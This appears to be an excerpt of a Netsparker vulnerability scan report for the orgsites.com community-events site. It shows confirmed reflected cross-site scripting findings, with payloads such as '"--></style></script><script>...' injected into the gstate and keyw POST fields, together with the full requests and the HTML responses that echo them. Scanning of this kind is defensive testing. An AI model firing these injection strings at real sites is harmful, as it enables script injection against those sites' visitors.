color="#d27a2b"><!--_leftT.html Start-->
<a href=javascript:OpenWindowJ('002_Website.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">
<b><font size="1"> WEBSITE</a>:</b> <br />(Create your site)
<br />
<a href=javascript:OpenWindowJ('002_NewsBar.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif"> NEWSBAR</a>: <br />(Create your newsbar)
<br />
<a href=javascript:OpenWindowJ('002_Directory.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">�DIRECTORY ENTRY</a>: <br/>(Don't need a website but want to be in the OrgSites Directory)
<br clear="all" />
<img src=../images/s.gif width="120" height="2" border="0" alt="s.gif">
Click on your choice.<br clear="all" />
You'll be on-line in minutes. Questions?<br />Read our <a href=http://www.orgsites.com/index.html?page=5>FAQs</a>.
</font>
<!--_leftT.html End--></td><td>&nbsp;&nbsp;</td></tr></table><br /><form action="index.html" method="POST"><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td>&nbsp;</td><td width="0" valign="top"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633"><b>Search<br>Neighborhood</b><br /></font></td></tr><tr valign="top"><td width="17"><img src=images/s.gif width="17" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Want to know what's<br />going on in a neighborhood?<br />Enter the zipcode<br>and &quot;Go&quot; find out.<br clear="all" /><img src=images/s.gif width="100" height="5"><br clear="all" />Category:<br /><select name="neighborhood"><option value="ALL">ALL
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
</select><br /><input type="radio" name="sts" CHECKED value="E">Events <input type="radio" name="sts" value="Y">Sites<br />Zip code:<br /><input type="text" name="SRCname" value="" size="9"><input type="submit" name="ZipSearch" value="Go!"></td></tr></table><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#006666"><input type="hidden" name="zzzip" value="search"></form><p /></td><td>&nbsp;&nbsp;&nbsp;</td></tr><!--_leftB.php3 Start-->
<!-- Talk to us section -->
<tr>
<td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td>
<td valign="top">
<font size="2" face="verdana,arial,helvetica" color="#666633">
<a href=javascript:OpenWindowE('_TOOL_eformH.php3?mailus=Mail','')>
<b>Talk to Us...</b></a><br /></font>
<font size="1" face="verdana,arial,helvetica" color="#666633">
Send us your questions or comments about your OrgSite. We really value your input, as it helps us prioritize our improvements.<p />
</td>
<td>����</td>
</tr>
<!--_leftB.php3 End--></table><!-- =============== end nested left nav table =============== --></td><!-- =============== DATE second column =============== --><td colspan="2" align="right" valign="top" bgcolor="#ffffcc"><img src=images/s.gif width="16" height="2" border="0" alt="s.gif"><br clear="all" /><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Monday May 02, 2011&nbsp;&nbsp;&nbsp;</font></td></tr><!-- =============== start second row =============== --><tr><td align="left" valign="top" bgcolor="#ffffcc"><table width="100%" cellspacing="0" cellpadding="13" border="0"><tr><td align="left" valign="top" bgcolor="#ffffcc"><!-- =============== start includes =============== --><table cellspacing="0" cellpadding="0" width="100%" border="0"><tr bgcolor="#cccc99"><td align="left"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc">&nbsp; <b>All Events This Week:</b></font>&nbsp;<font face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc" size="2">In \'\"--></style></script><script>netsparker(0x00034A)</script>,In All States</td> <td align="right" valign="top"><img src=images/rcorner.gif width="11" height="11" border="0" alt="rcorner.gif"></td></tr><tr bgcolor="#989868"><td colspan="2" valign="top"><img src=images/s.gif width="360" height="2"></td></tr></table><table border="0" width="100%" cellpadding="0" cellspacing="0"><tr><td align="right" valign="top"><font face="arial" size="1" color="#989868">&nbsp;58 FOUND</font></td></tr></table><table border="0" width="100%" cellpadding="2" cellspacing="0"><tr><td align="left" valign="top"><font face="Arial,Helvetica" color="#000000" size="2"><p /><font face="verdana,arial,helvetica" size="2" color="FF0000"><b><i>TODAY !!!</i></b></font><hr noshade /><font face="verdana,arial" size="2" color="#000000"><b>USA Practice</b><font face="arial" size="2" color="#000000"><br />-&nbsp; Group 1 Yoga: 4:<font color="#FF0000"><b>3</b></font>0-5:<font color="#FF0000"><b>3</b></font>0pm
Group 2 Bootcamp: 6:00-6:<font color="#FF0000"><b>3</b></font>0pm
Group 2 Swim: 7:15-9:00pm
Group <font color="#FF0000"><b>3</b></font> Swim: 7:15-9:<font color="#FF0000"><b>3</b></font>0pm</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=ma/wtsc target="_blank">Westboro Tennis and Swim Club</a><br />(Westborough MA, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>PLC Meeting</b><font face="arial" size="2" color="#000000"><br />-&nbsp; 7:<font color="#FF0000"><b>3</b></font>0 PM @ the CEB. All Scouts in a leadership position and all ASM's are asked to attend.</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=nj/troop199 target="_blank">BSA Troop 199 - Oldwick, New Jersey 08858</a><br />(Oldwick NJ, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>Plant Sale</b><font face="arial" size="2" color="#000000"><br />-&nbsp; Parents are invited to shop from 2:15 to <font color="#FF0000"><b>3</b></font>:<font color="#FF0000"><b>3</b></font>0. Sale will be outside on Massachusetts Ave.</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=ny/eastlakepta target="_blank">2010-2011 </a><br />(Massapequa Park NY, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>Team Photo Day</b><font face="arial" size="2" color="#000000"><br />-&nbsp; 4:<font color="#FF0000"><b>3</b></font>0pm at Kasch Park. Wear maroon kit.</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=wa/tynecastle94 target="_blank">WELCOMEtoTIFC 94 online</a><br />(Everett WA, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>Branch Meeting</b><font face="arial" size="2" color="#000000"><br />5:30pm-8:00pm&nbsp; Upton House
<font color="#FF0000"><b>3</b></font>80 Mahoning Avenue, N.W.
Warren, Ohio

Tour of Historical Home
led by
Docents of Upton House

5:<font color="#FF0000"><b>3</b></font>0 P.M. Tour of Home
6:<font color="#FF0000"><b>3</b></font>0 P.M. Dinner
7:00 P.M. Business Meeting and Installation of 2011-2012 Officers</font></font>&nbsp;<font face="arial,helvetica" size="1"><a href="http://www.mapquest.com/maps?&1c=&1s=&1a=&1z=&1y=US&1v=ADDRESS&2c=Warren&2s=Oh&2a=380+Mahoning+Avenue&2z=44483&2y=US" target="_blank">SEE MAP</a><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=oh/warren-trumbull-aauw target="_blank">WARREN-TRUMBULL COUNTY AAUW, Warren, OH</a><br />(Warren Oh, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>KCCT Testing</b><font face="arial" size="2" color="#000000"><br />8:00am-3:00pm&nbsp; We will prepare to begin Kentucky Core Content Testing today. This is for <font color="#FF0000"><b>3</b></font>rd - 8th grades.</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=ky/ebispto target="_blank">East Bernstadt Schools Parent Teacher Organization</a><br />(East Bernstadt KY, USA)</font><br /><p /><font face="verdana,arial,helvetica" size="2" color="#ff6633">&nbsp;<br /><b>Tuesday May 03</b></font><hr noshade /><font face="verdana,arial" size="2" color="#000000"><b>WELCA</b><font face="arial" size="2" color="#000000"><br />-&nbsp; Ladies of the congregation will meet at 1:<font color="#FF0000"><b>3</b></font>0PM.</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=fl/reformation target="_blank">Reformation Lutheran Church</a><br />(Lakeland FL, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>Weekly Meeting</b><font face="arial" size="2" color="#000000"><br />-&nbsp; 7:00 - 8:<font color="#FF0000"><b>3</b></font>0 pm
Ankeny E Free Church</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=ia/ankenytroop85 target="_blank">Welcome to the Boy Scout Troop 85 Website</a><br />(Ankeny IA, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>Happy Hour</b><font face="arial" size="2" color="#000000"><br />-&nbsp; <font color="#FF0000"><b>3</b></font>-6</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=ky/american-legion-chief-paduke-post-31 target="_blank">American Legion Chief Paduke Post 31</a><br />(Paducah KY, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>Plant Sale</b><font face="arial" size="2" color="#000000"><br />-&nbsp; ..
- /index.html

/index.html CONFIRMED

http://www.orgsites.com/index.html

Parameters

Parameter Type Value
FullSearch POST GO
gcity POST 3
gstate POST '"--></style></script><script>alert(0x000375)</script>
keyw POST 3
neighborhood POST ALL
sts POST E

Request

POST /index.html HTTP/1.1
Referer: http://www.orgsites.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=850614471; idV[49035]=1819662969; idV[54622]=1470334296; idV[52895]=643587439; idV[48945]=1693390705; idV[47313]=305822373; idV[1911]=1650887235; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 144
Accept-Encoding: gzip, deflate

FullSearch=GO&gcity=3&gstate='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000375)%3c%2fscript%3e&keyw=3&neighborhood=ALL&sts=E

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 15:13:10 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Set-Cookie: idVistor[3]=653740671; expires=Tue, 03-May-11 15:13:13 GMT; path=/; domain=.orgsites.com
Transfer-Encoding: chunked
Content-Type: text/html


<!--added html xmlns below on 12-03-10--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" /><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" /><head><meta name="description" content="FREE websites and registry for organizations groups clubs teams, we help you create a free website which lists your events on Global Neighborhood Orgsites Registry Directory of Organizations with internal search engine"><meta name="keywords" content="Free websites,Registry Directory of Organizations,teams, members,organization management,clubs,groups,associations, search engine,events,global neighborhood,orgsites.com"><title>Free websites and registry directory for organizations or groups plus internal search engine for Global Neighborhood Orgsites free websites</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-type" content="text/html; charset=iso-8859-1" /><meta http-equiv="pragma" content="no-cache" /><meta name="robots" content="Index,Follow" /><style type="text/css"><!--a:link {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:active {color :#660000; font-family:arial,helvetica; text-decoration:underline;}a:visited {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:hover {color :Chocolate; font-family:arial,helvetica; text-decoration:underline;}--></style><script type="text/javascript" language="javascript">// <![CDATA[function OpenWindowE(url, name){ popupWin = window.open(url, name, 'noscroll,width=300,height=350,left=50,top=50')}//01-30-11: change window parms to make it largerfunction OpenWindowJ(url, name){//01-30-11 popupWin = window.open(url, name, 'scrollbars,width=490,height=480,left=10,top=0') popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}function OpenWindowM(url, name){ popupWin = window.open(url, name, 'noscroll,status,width=380,height=245,left=50,top=50')}function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// ]]> </script></head><body bgcolor="#ffffcc" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#003333" link="#800000" vlink="#800000" alink="#660000"><a name="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td width="176" align="left" valign="top" rowspan="2" bgcolor="#FFFFFF"><map name="OrgSite"><area shape="RECT" coords="15,13,175,59" href="index.html"></map><img src=images/logo2.gif width="176" height="182" border="0" usemap="#OrgSite" alt="OrgSites"><img src=images/join2.gif width="176" height="20" alt="Join Now!" border="0" align="top"><table width="176" cellpadding="4" cellspacing="0" border="0"><tr valign="top"><td width="4" valign="top"><img src=images/s.gif width="4" height="1" border="0" alt="s.gif"></td><td valign="top"><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#d27a2b"><!--_leftT.html Start-->
<a href=javascript:OpenWindowJ('002_Website.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">
<b><font size="1"> WEBSITE</a>:</b> <br />(Create your site)
<br />
<a href=javascript:OpenWindowJ('002_NewsBar.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif"> NEWSBAR</a>: <br />(Create your newsbar)
<br />
<a href=javascript:OpenWindowJ('002_Directory.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">�DIRECTORY ENTRY</a>: <br/>(Don't need a website but want to be in the OrgSites Directory)
<br clear="all" />
<img src=../images/s.gif width="120" height="2" border="0" alt="s.gif">
Click on your choice.<br clear="all" />
You'll be on-line in minutes. Questions?<br />Read our <a href=http://www.orgsites.com/index.html?page=5>FAQs</a>.
</font>
<!--_leftT.html End--></td><td>&nbsp;&nbsp;</td></tr></table><br /><form action="index.html" method="POST"><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td>&nbsp;</td><td width="0" valign="top"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633"><b>Search<br>Neighborhood</b><br /></font></td></tr><tr valign="top"><td width="17"><img src=images/s.gif width="17" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Want to know what's<br />going on in a neighborhood?<br />Enter the zipcode<br>and &quot;Go&quot; find out.<br clear="all" /><img src=images/s.gif width="100" height="5"><br clear="all" />Category:<br /><select name="neighborhood"><option value="ALL">ALL
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
</select><br /><input type="radio" name="sts" CHECKED value="E">Events <input type="radio" name="sts" value="Y">Sites<br />Zip code:<br /><input type="text" name="SRCname" value="" size="9"><input type="submit" name="ZipSearch" value="Go!"></td></tr></table><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#006666"><input type="hidden" name="zzzip" value="search"></form><p /></td><td>&nbsp;&nbsp;&nbsp;</td></tr><!--_leftB.php3 Start-->
<!-- Talk to us section -->
<tr>
<td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td>
<td valign="top">
<font size="2" face="verdana,arial,helvetica" color="#666633">
<a href=javascript:OpenWindowE('_TOOL_eformH.php3?mailus=Mail','')>
<b>Talk to Us...</b></a><br /></font>
<font size="1" face="verdana,arial,helvetica" color="#666633">
Send us your questions or comments about your OrgSite. We really value your input, as it helps us prioritize our improvements.<p />
</td>
<td>����</td>
</tr>
<!--_leftB.php3 End--></table><!-- =============== end nested left nav table =============== --></td><!-- =============== DATE second column =============== --><td colspan="2" align="right" valign="top" bgcolor="#ffffcc"><img src=images/s.gif width="16" height="2" border="0" alt="s.gif"><br clear="all" /><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Monday May 02, 2011&nbsp;&nbsp;&nbsp;</font></td></tr><!-- =============== start second row =============== --><tr><td align="left" valign="top" bgcolor="#ffffcc"><table width="100%" cellspacing="0" cellpadding="13" border="0"><tr><td align="left" valign="top" bgcolor="#ffffcc"><!-- =============== start includes =============== --><table cellspacing="0" cellpadding="0" width="100%" border="0"><tr bgcolor="#cccc99"><td align="left"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc">&nbsp; <b>All Events This Week:</b></font>&nbsp;<font face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc" size="2">In 3,\'\"--></style></script><script>netsparker(0x000375)</script></td> <td align="right" valign="top"><img src=images/rcorner.gif width="11" height="11" border="0" alt="rcorner.gif"></td></tr><tr bgcolor="#989868"><td colspan="2" valign="top"><img src=images/s.gif width="360" height="2"></td></tr></table><table border="0" width="100%" cellpadding="0" cellspacing="0"><tr><td align="right" valign="top"><font face="arial" size="1" color="#989868">&nbsp;58 FOUND</font></td></tr></table><table border="0" width="100%" cellpadding="2" cellspacing="0"><tr><td align="left" valign="top"><font face="Arial,Helvetica" color="#000000" size="2"><p /><font face="verdana,arial,helvetica" size="2" color="FF0000"><b><i>TODAY !!!</i></b></font><hr noshade /><font face="verdana,arial" size="2" color="#000000"><b>USA Practice</b><font face="arial" size="2" color="#000000"><br />-&nbsp; Group 1 Yoga: 4:<font color="#FF0000"><b>3</b></font>0-5:<font color="#FF0000"><b>3</b></font>0pm
Group 2 Bootcamp: 6:00-6:<font color="#FF0000"><b>3</b></font>0pm
Group 2 Swim: 7:15-9:00pm
Group <font color="#FF0000"><b>3</b></font> Swim: 7:15-9:<font color="#FF0000"><b>3</b></font>0pm</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=ma/wtsc target="_blank">Westboro Tennis and Swim Club</a><br />(Westborough MA, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>PLC Meeting</b><font face="arial" size="2" color="#000000"><br />-&nbsp; 7:<font color="#FF0000"><b>3</b></font>0 PM @ the CEB. All Scouts in a leadership position and all ASM's are asked to attend.</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=nj/troop199 target="_blank">BSA Troop 199 - Oldwick, New Jersey 08858</a><br />(Oldwick NJ, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>Plant Sale</b><font face="arial" size="2" color="#000000"><br />-&nbsp; Parents are invited to shop from 2:15 to <font color="#FF0000"><b>3</b></font>:<font color="#FF0000"><b>3</b></font>0. Sale will be outside on Massachusetts Ave.</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=ny/eastlakepta target="_blank">2010-2011 </a><br />(Massapequa Park NY, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>Team Photo Day</b><font face="arial" size="2" color="#000000"><br />-&nbsp; 4:<font color="#FF0000"><b>3</b></font>0pm at Kasch Park. Wear maroon kit.</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=wa/tynecastle94 target="_blank">WELCOMEtoTIFC 94 online</a><br />(Everett WA, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>Branch Meeting</b><font face="arial" size="2" color="#000000"><br />5:30pm-8:00pm&nbsp; Upton House
<font color="#FF0000"><b>3</b></font>80 Mahoning Avenue, N.W.
Warren, Ohio

Tour of Historical Home
led by
Docents of Upton House

5:<font color="#FF0000"><b>3</b></font>0 P.M. Tour of Home
6:<font color="#FF0000"><b>3</b></font>0 P.M. Dinner
7:00 P.M. Business Meeting and Installation of 2011-2012 Officers</font></font>&nbsp;<font face="arial,helvetica" size="1"><a href="http://www.mapquest.com/maps?&1c=&1s=&1a=&1z=&1y=US&1v=ADDRESS&2c=Warren&2s=Oh&2a=380+Mahoning+Avenue&2z=44483&2y=US" target="_blank">SEE MAP</a><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=oh/warren-trumbull-aauw target="_blank">WARREN-TRUMBULL COUNTY AAUW, Warren, OH</a><br />(Warren Oh, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>KCCT Testing</b><font face="arial" size="2" color="#000000"><br />8:00am-3:00pm&nbsp; We will prepare to begin Kentucky Core Content Testing today. This is for <font color="#FF0000"><b>3</b></font>rd - 8th grades.</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=ky/ebispto target="_blank">East Bernstadt Schools Parent Teacher Organization</a><br />(East Bernstadt KY, USA)</font><br /><p /><font face="verdana,arial,helvetica" size="2" color="#ff6633">&nbsp;<br /><b>Tuesday May 03</b></font><hr noshade /><font face="verdana,arial" size="2" color="#000000"><b>WELCA</b><font face="arial" size="2" color="#000000"><br />-&nbsp; Ladies of the congregation will meet at 1:<font color="#FF0000"><b>3</b></font>0PM.</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=fl/reformation target="_blank">Reformation Lutheran Church</a><br />(Lakeland FL, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>Weekly Meeting</b><font face="arial" size="2" color="#000000"><br />-&nbsp; 7:00 - 8:<font color="#FF0000"><b>3</b></font>0 pm
Ankeny E Free Church</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=ia/ankenytroop85 target="_blank">Welcome to the Boy Scout Troop 85 Website</a><br />(Ankeny IA, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>Happy Hour</b><font face="arial" size="2" color="#000000"><br />-&nbsp; <font color="#FF0000"><b>3</b></font>-6</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=ky/american-legion-chief-paduke-post-31 target="_blank">American Legion Chief Paduke Post 31</a><br />(Paducah KY, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>Plant Sale</b><font face="arial" size="2" color="#000000"><br />-&nbsp; Parents..
- /index.html

/index.html CONFIRMED

http://www.orgsites.com/index.html

Parameters

Parameter Type Value
FullSearch POST GO
gcity POST 3
gstate POST ALL
keyw POST '"--></style></script><script>alert(0x000455)</script>
neighborhood POST ALL
sts POST E

Request

POST /index.html HTTP/1.1
Referer: http://www.orgsites.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=850614471; idV[49035]=1819662969; idV[54622]=1470334296; idV[52895]=643587439; idV[48945]=1693390705; idV[47313]=305822373; idV[1911]=1650887235; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 146
Accept-Encoding: gzip, deflate

FullSearch=GO&gcity=3&gstate=ALL&keyw='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000455)%3c%2fscript%3e&neighborhood=ALL&sts=E

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 15:13:29 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Set-Cookie: idVistor[3]=804229694; expires=Tue, 03-May-11 15:13:32 GMT; path=/; domain=.orgsites.com
Transfer-Encoding: chunked
Content-Type: text/html


<!--added html xmlns below on 12-03-10--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" /><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" /><head><meta name="description" content="FREE websites and registry for organizations groups clubs teams, we help you create a free website which lists your events on Global Neighborhood Orgsites Registry Directory of Organizations with internal search engine"><meta name="keywords" content="Free websites,Registry Directory of Organizations,teams, members,organization management,clubs,groups,associations, search engine,events,global neighborhood,orgsites.com"><title>Free websites and registry directory for organizations or groups plus internal search engine for Global Neighborhood Orgsites free websites</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-type" content="text/html; charset=iso-8859-1" /><meta http-equiv="pragma" content="no-cache" /><meta name="robots" content="Index,Follow" /><style type="text/css"><!--a:link {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:active {color :#660000; font-family:arial,helvetica; text-decoration:underline;}a:visited {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:hover {color :Chocolate; font-family:arial,helvetica; text-decoration:underline;}--></style><script type="text/javascript" language="javascript">// <![CDATA[function OpenWindowE(url, name){ popupWin = window.open(url, name, 'noscroll,width=300,height=350,left=50,top=50')}//01-30-11: change window parms to make it largerfunction OpenWindowJ(url, name){//01-30-11 popupWin = window.open(url, name, 'scrollbars,width=490,height=480,left=10,top=0') popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}function OpenWindowM(url, name){ popupWin = window.open(url, name, 'noscroll,status,width=380,height=245,left=50,top=50')}function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// ]]> </script></head><body bgcolor="#ffffcc" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#003333" link="#800000" vlink="#800000" alink="#660000"><a name="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td width="176" align="left" valign="top" rowspan="2" bgcolor="#FFFFFF"><map name="OrgSite"><area shape="RECT" coords="15,13,175,59" href="index.html"></map><img src=images/logo2.gif width="176" height="182" border="0" usemap="#OrgSite" alt="OrgSites"><img src=images/join2.gif width="176" height="20" alt="Join Now!" border="0" align="top"><table width="176" cellpadding="4" cellspacing="0" border="0"><tr valign="top"><td width="4" valign="top"><img src=images/s.gif width="4" height="1" border="0" alt="s.gif"></td><td valign="top"><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#d27a2b"><!--_leftT.html Start-->
<a href=javascript:OpenWindowJ('002_Website.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">
<b><font size="1"> WEBSITE</a>:</b> <br />(Create your site)
<br />
<a href=javascript:OpenWindowJ('002_NewsBar.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif"> NEWSBAR</a>: <br />(Create your newsbar)
<br />
<a href=javascript:OpenWindowJ('002_Directory.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">�DIRECTORY ENTRY</a>: <br/>(Don't need a website but want to be in the OrgSites Directory)
<br clear="all" />
<img src=../images/s.gif width="120" height="2" border="0" alt="s.gif">
Click on your choice.<br clear="all" />
You'll be on-line in minutes. Questions?<br />Read our <a href=http://www.orgsites.com/index.html?page=5>FAQs</a>.
</font>
<!--_leftT.html End--></td><td>&nbsp;&nbsp;</td></tr></table><br /><form action="index.html" method="POST"><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td>&nbsp;</td><td width="0" valign="top"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633"><b>Search<br>Neighborhood</b><br /></font></td></tr><tr valign="top"><td width="17"><img src=images/s.gif width="17" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Want to know what's<br />going on in a neighborhood?<br />Enter the zipcode<br>and &quot;Go&quot; find out.<br clear="all" /><img src=images/s.gif width="100" height="5"><br clear="all" />Category:<br /><select name="neighborhood"><option value="ALL">ALL
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
